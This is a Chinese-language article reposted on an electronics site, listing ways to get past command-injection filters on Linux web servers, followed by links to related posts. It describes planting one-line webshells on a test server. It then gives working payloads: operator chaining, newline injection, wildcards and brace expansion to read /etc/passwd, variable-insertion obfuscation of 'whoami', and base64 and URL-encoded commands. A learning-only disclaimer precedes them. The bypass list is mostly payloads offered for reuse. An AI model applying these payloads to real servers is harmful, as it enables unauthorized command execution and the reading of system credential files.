?
0x00寫在前面
本次測試僅供學(xué)習(xí)使用,如若非法他用,與平臺和本文作者無關(guān),需自行負(fù)責(zé)!
?
0x01實(shí)踐演示
部署服務(wù)器端為Linux系統(tǒng)的http服務(wù),留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
linux邏輯運(yùn)算符
; //分號
| //僅執(zhí)行后面那條命令
|| //僅執(zhí)行前面那條命令
& //兩條命令都會執(zhí)行
&& //兩條命令都會執(zhí)行(注意url編碼)
%0a //換行符 %0d //回車符
利用通配符
通配符"?"代表任意一個字符,"*"代表任意個字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
嘗試
cat /*****et*c*/*pas**************************************************swd
結(jié)合上述方式進(jìn)行組合bypass
echo mt ; whoami
使用大括號來繞過空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami
wh$1oami
who$@ami
whoa$*mi
命令變形
*in/who*mi
base64編碼方式進(jìn)行
echo id|base64
echo id|base64
URL編碼
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
原文標(biāo)題:Linux命令執(zhí)行Bypass常見姿勢
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
相關(guān)推薦
摘要:這是對周立功編著的《嵌入式Linux開發(fā)教程》的第7期連載。本期刊載內(nèi)容有關(guān)LinuxLinux常見命令中的導(dǎo)航命令、目錄命令和文件
發(fā)表于 10-28 10:06
一、學(xué)習(xí)常見的Linux命令(1)文件操作命令主要包括查看文件命令(ls)、顯示文件內(nèi)容命令(c
發(fā)表于 11-05 08:43
Linux命令中的鏈接的意思是,通過操作符的行為將幾個命令組合執(zhí)行。Linux中的鏈接命令,有些
發(fā)表于 05-06 17:44
?840次閱讀
摘要:這是對周立功編著的《嵌入式Linux開發(fā)教程》的第7期連載。本期刊載內(nèi)容有關(guān)LinuxLinux常見命令中的導(dǎo)航命令、目錄命令和文件
發(fā)表于 10-21 13:36
?11次下載
如果命令執(zhí)行的時候遇到攔截命令關(guān)鍵詞的時候可以利用如下方法繞過: "和^是CMD命令中最常見的轉(zhuǎn)義字符,還有成對的括號并不會影響
發(fā)表于 11-07 20:27
?990次閱讀
Linux touch命令用于更改文件時間戳。但touch命令的最常見用法是創(chuàng)建文件。
發(fā)表于 12-05 17:21
?2072次閱讀
部署服務(wù)器端為Linux系統(tǒng)的http服務(wù),留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
發(fā)表于 05-22 16:20
?1993次閱讀
今天浩道跟大家分享linux網(wǎng)絡(luò)運(yùn)維中常見的命令,掌握好這些命令,在排查故障時將會游刃有余!
發(fā)表于 06-25 10:49
?807次閱讀
Shell命令和Linux命令并不完全一樣。 首先,Shell是一種命令行解釋器,它是用來解釋和執(zhí)行用戶輸入的
發(fā)表于 11-08 10:51
?2864次閱讀
Linux命令和Shell編程之間存在密切的聯(lián)系。 首先,Shell是Linux命令行下的解釋器,它提供了一個用戶界面,使用戶能夠與Linux
發(fā)表于 11-08 10:53
?915次閱讀
在Linux中,source命令通常用于重新執(zhí)行剛修改的初始化文件,使之立即生效,而不必注銷并重新登錄。source命令可以用于讀取并執(zhí)行腳
發(fā)表于 11-08 14:35
?2326次閱讀
Linux是一種自由和開放源代碼的操作系統(tǒng),被廣泛應(yīng)用于服務(wù)器和嵌入式設(shè)備。在Linux中,有多種命令用于重啟系統(tǒng)。在本文中,我們將詳細(xì)介紹常用的Linux重啟
發(fā)表于 11-17 09:49
?2027次閱讀
Linux命令行是一種在Linux操作系統(tǒng)中通過文本界面來執(zhí)行指令和管理系統(tǒng)的方式。它提供了豐富的功能和靈活性,幫助用戶完成各種任務(wù)。本文將詳細(xì)介紹
發(fā)表于 11-17 10:19
?662次閱讀
U-boot是通過執(zhí)行u-boot提供的命令來加載Linux內(nèi)核的,其中 命令bootm的功能 即為從memory啟動Linux內(nèi)核映像文件
發(fā)表于 12-04 17:31
?800次閱讀
Bypass電容的大小和計(jì)算方法 Bypass電容是一種常見的電子元件,用于繞過或降低電路中的噪聲、干擾或漏磁磁通。它能夠有效地將高頻噪聲或漏磁磁通通過一個低阻抗路徑繞過,從而保持電路的穩(wěn)定性和信號
發(fā)表于 02-14 17:56
?4053次閱讀
評論